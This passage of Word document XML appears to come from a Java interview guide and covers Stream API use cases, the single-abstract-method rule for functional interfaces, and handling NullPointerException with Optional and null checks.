        <w:t xml:space="preserve">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etc., which leads to more maintainable and concise code.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5C1D1C4B"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Intermediat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meaning they are not computed until a terminal operation is invoked. This allows for more efficient processing, especially in the case of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w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="63D3548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8. Use Cases of Stream API</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3D5F3688"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Data Transformation</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transform</w:t>
      </w:r>
      <w:r w:rsidRPr="00397A42">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> elements (e.g., square numbers, convert strings to uppercase).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="08BBD7AD"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data (e.g., select only even numbers, filter users by age).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="294DBA47"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ggregate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aggregate</w:t>
      </w:r>
      <w:r w:rsidRPr="00397A42">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> data (e.g., find the sum, average, or maximum of a collection).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="25EFF2A3"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ort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sort</w:t>
      </w:r>
      <w:r w:rsidRPr="00397A42">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> data (e.g., sort users by their names or sort numbers in ascending order).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="013C1D94"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9. Stream API Example</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7A475961"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ere's an example demonstrating </w:t>
      </w:r>
      <w:r w:rsidRPr="00397A42">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>filtering</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mapp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reducing</w:t>
      </w:r>
      <w:r w:rsidRPr="00397A42">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> operations using the Stream API:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1E3CDB4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w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1FB5B7C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stream.*;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1957CD25" w14:textId="77777777" w:rsidR="00E641A5" w:rsidRPr="00397A42" w:rsidRDefault="00E641A5" w:rsidP="00397A42">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="5865D05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StreamExample {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="54F699E2"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137A4BBF"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List&lt;Integer&gt; numbers = Arrays.asList(1, 2, 3, 4, 5, 6, 7, 8, 9, 10);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="55B88D4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41144D9"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Find the sum of squares of even numbers</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="458B011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result = numbers.stream()</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="00B4A08D"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even numbers</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2C7FFD9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             // Square them</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4531595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 // Sum of squares</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="113C18E9" w14:textId="77777777" w:rsidR="00E641A5" w:rsidRPr="00397A42" w:rsidRDefault="00E641A5" w:rsidP="00397A42">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="49945F5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Sum of squares of even numbers: " + result); // Output: 220</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5C1A450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6D6EEC3"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E92AB26"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0. Conclusion</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4BBC917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Stream API in Java provides a modern and functional approach to working with sequences of data. By leveraging stream operations like map, filter, and reduce, you can write </w:t>
      </w:r>
      <w:r w:rsidRPr="00397A42">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>clean</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concis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parallelizable</w:t>
      </w:r>
      <w:r w:rsidRPr="00397A42">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> code. The </w:t>
      </w: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model, </w:t>
      </w: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easy chaining</w:t>
      </w:r>
      <w:r w:rsidRPr="00397A42">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> of operations make it highly efficient for tasks like data transformation, aggregation, and filtering.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4ABC2FAC" w14:textId="14126A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73" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="55F17CE7" w14:textId="77777777" w:rsidR="00F64AB0" w:rsidRPr="00CE4B95" w:rsidRDefault="00F64AB0">
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
        <w:spacing w:before="0"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="0070C0"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="258" w:name="_Toc197867472"/>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="0070C0"/>
        </w:rPr>
        <w:t>Can we have more than one abstract method in a functional interface?</w:t>
      </w:r>
      <w:bookmarkEnd w:id="258"/>
    </w:p>
    <w:p w14:paraId="6094E8FB" w14:textId="1F9D11BA" w:rsidR="00B57733" w:rsidRPr="00397A42" w:rsidRDefault="00B57733"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No, a </w:t>
      </w:r>
      <w:r w:rsidRPr="00397A42">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>functional interface</w:t>
      </w:r>
      <w:r w:rsidRPr="00397A42">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> can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This is one of the key characteristics that distinguishes functional interfaces from regular interfaces.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4BBAC9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is intended to represent a </w:t>
      </w:r>
      <w:r w:rsidRPr="00397A42">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>single function</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w:t>
      </w:r>
      <w:r w:rsidRPr="00397A42">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> and is used primarily for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in Java. If you have more than one abstract method in an interface, it will not be considered a functional interface.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="57CBC90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 this interface is valid as a functional interface because it has only one abstract method:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3FEB0B7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3724E2B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1D19C585"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w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="00BB46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B92252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owever, the following interface is </w:t>
      </w:r>
      <w:r w:rsidRPr="00397A42">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>not</w:t>
      </w:r>
      <w:r w:rsidRPr="00397A42">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> a functional interface because it has </w:t>
      </w:r>
      <w:r w:rsidRPr="00397A42">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>two abstract methods</w:t>
      </w:r>
      <w:r w:rsidRPr="00397A42">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="20A7EA4A"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64D3E2CC"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InvalidFunctionalInterface {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2FB0A0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One();</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2604CF54"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Two();</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="21927E3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0BFFEBE1"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Why Only One Abstract Method?</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7408D48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reason behind this is that functional interfaces are used to represent single-method contracts, such as those used by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Allowing multiple abstract methods would make it ambiguous which method should be referred to when using a lambda expression.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="11CF1FCF"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Default and Static Methods in Functional Interfaces</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="520401F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w:t>
      </w:r>
      <w:r w:rsidRPr="00397A42">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>can</w:t>
      </w:r>
      <w:r w:rsidRPr="00397A42">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> have any number of </w:t>
      </w:r>
      <w:r w:rsidRPr="00397A42">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>default</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static methods</w:t>
      </w:r>
      <w:r w:rsidRPr="00397A42">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>, as they are not considered abstract methods. These methods do not affect the "functional" nature of the interface because they have implementations.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7ECC62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w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="01F19F8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2D819F1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60C0ECCE"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  // Abstract method</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="64497533" w14:textId="77777777" w:rsidR="00B57733" w:rsidRPr="00397A42" w:rsidRDefault="00B57733" w:rsidP="00397A42">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="7122019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default void defaultMethod() {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="40A4C6F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default method");</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0C70DC6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60C40E84" w14:textId="77777777" w:rsidR="00B57733" w:rsidRPr="00397A42" w:rsidRDefault="00B57733" w:rsidP="00397A42">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="5C6DD982"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atic void staticMethod() {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7D3E3E3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static method");</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="57E5DD0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85E65E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8777C59"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In summary, a functional interface can have multiple default or static methods, but it must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xml:space="preserve"> to remain a functional interface.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0A2CC899" w14:textId="4074D01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74" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="4044048B" w14:textId="77777777" w:rsidR="001E08D1" w:rsidRPr="00CE4B95" w:rsidRDefault="001E08D1">
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
        <w:spacing w:before="0"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="0070C0"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="259" w:name="_Toc197867473"/>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="0070C0"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>Have you worked on NullPointerException? How to handle NullPointerException in java 8?</w:t>
      </w:r>
      <w:bookmarkEnd w:id="259"/>
    </w:p>
    <w:p w14:paraId="390B538C" w14:textId="2930E78B" w:rsidR="006E761D" w:rsidRPr="00397A42" w:rsidRDefault="006E761D"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es, </w:t>
      </w:r>
      <w:r w:rsidRPr="00397A42">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>NullPointerException (NPE)</w:t>
      </w:r>
      <w:r w:rsidRPr="00397A42">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>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How to Handle NullPointerException in Java 8</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0BAAFB0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several approaches have been introduced to handle NullPointerException more effectively. Here's how you can handle it:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="396C94A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Using Optional Class (Java 8)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="158FD7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Here’s an example of using Optional to handle NullPointerException:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="744E156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72981A49" w14:textId="77777777" w:rsidR="006E761D" w:rsidRPr="00397A42" w:rsidRDefault="006E761D" w:rsidP="00397A42">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="503544C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269B58B0" w14:textId="77777777" w:rsidR="006E761D" w:rsidRPr="00397A42" w:rsidRDefault="006E761D" w:rsidP="00397A42">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="30A610B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DDCC9F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4A3E2356" w14:textId="77777777" w:rsidR="006E761D" w:rsidRPr="00397A42" w:rsidRDefault="006E761D" w:rsidP="00397A42">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="4CDE83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to avoid NullPointerException</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0F57017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lt;String&gt; optionalName = Optional.ofNullable(name);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="17DEEC7F" w14:textId="77777777" w:rsidR="006E761D" w:rsidRPr="00397A42" w:rsidRDefault="006E761D" w:rsidP="00397A42">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="5E23909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ifPresent() method to check if the value is present</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="156DC8A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Name.ifPresent(n -&gt; System.out.println("Name length: " + n.length()));</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2FB71DBC" w14:textId="77777777" w:rsidR="006E761D" w:rsidRPr="00397A42" w:rsidRDefault="006E761D" w:rsidP="00397A42">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="1EFC8D3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 to provide a default value if null</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="59C146B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defaultName = optionalName.orElse("Default Name");</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="66C4053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 + defaultName);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="09083A04" w14:textId="77777777" w:rsidR="006E761D" w:rsidRPr="00397A42" w:rsidRDefault="006E761D" w:rsidP="00397A42">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="1BA65FA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Throw() to throw a custom exception if value is absent</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="58B160D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fetchedName = optionalName.orElseThrow(() -&gt; new IllegalArgumentException("Name cannot be null"));</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="27DCEEA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Fetched Name: " + fetchedName);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="61BC2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A61FAB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6BDB3C67"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Explanation:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="54A92F08"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ofNullable()</w:t>
      </w:r>
      <w:r w:rsidRPr="00397A42">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>: Creates an Optional object that can hold a null or non-null value.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="797E2A3B"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fPresent()</w:t>
      </w:r>
      <w:r w:rsidRPr="00397A42">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>: Checks if the value is present and executes the given lambda expression if it is.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="782721F3"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w:t>
      </w:r>
      <w:r w:rsidRPr="00397A42">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>: Provides a default value if the Optional is empty (null).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="104E65AF"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Throw()</w:t>
      </w:r>
      <w:r w:rsidRPr="00397A42">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>: Throws an exception if the Optional is empty.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2A9FAE8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Null Safe Method Calls Using Objects Class</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4AF78DF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the Objects class provides utility methods to avoid NullPointerException. One such method is Objects.requireNonNull().</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="160D3E0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bjects;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="15116677" w14:textId="77777777" w:rsidR="006E761D" w:rsidRPr="00397A42" w:rsidRDefault="006E761D" w:rsidP="00397A42">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="5794A77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7CEA52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446A297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37C6C2A1" w14:textId="77777777" w:rsidR="006E761D" w:rsidRPr="00397A42" w:rsidRDefault="006E761D" w:rsidP="00397A42">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="5F257DF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his will throw NullPointerException with a custom message if 'name' is null</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3C5F5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try {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="314642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bjects.requireNonNull(name, "Name cannot be null");</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6F7A8B6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catch (NullPointerException e) {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4B4299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Caught exception: " + e.getMessage());</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="55160DB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4A18786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lastRenderedPageBreak/>
        <w:t xml:space="preserve">    }</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="27CEC7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2C3992C"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Using Ternary Operator or Null Checks</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="64D80B0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Before performing operations on an object, you can manually check for null values to avoid a NullPointerException:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4F2B971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64FD96B" w14:textId="77777777" w:rsidR="006E761D" w:rsidRPr="00397A42" w:rsidRDefault="006E761D" w:rsidP="00397A42">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="5054C11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5E7FE29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6B25DD1A" w14:textId="77777777" w:rsidR="006E761D" w:rsidRPr="00397A42" w:rsidRDefault="006E761D" w:rsidP="00397A42">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="26A02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raditional null check to avoid NPE</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="69B1AD7B"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 (name != null) {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="60593BA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name.length());</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5A5316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else {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="408828E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is null");</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4296E9F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329B32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6FB9C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DAC243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lternatively, you can use the ternary operator:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4FF7058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29D31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7375E4E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0CDAFDD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length = (name != null) ? name.length() : 0;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4848A9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length);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="26A3F3C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ACBDD6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9F99686"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Optional and Method References</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="77109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method references to streamline null-safe operations:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="52AEB08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12B76265" w14:textId="77777777" w:rsidR="006E761D" w:rsidRPr="00397A42" w:rsidRDefault="006E761D" w:rsidP="00397A42">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="204682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4C0473D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1DDE1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John Doe";</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="181025B7" w14:textId="77777777" w:rsidR="006E761D" w:rsidRPr="00397A42" w:rsidRDefault="006E761D" w:rsidP="00397A42">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
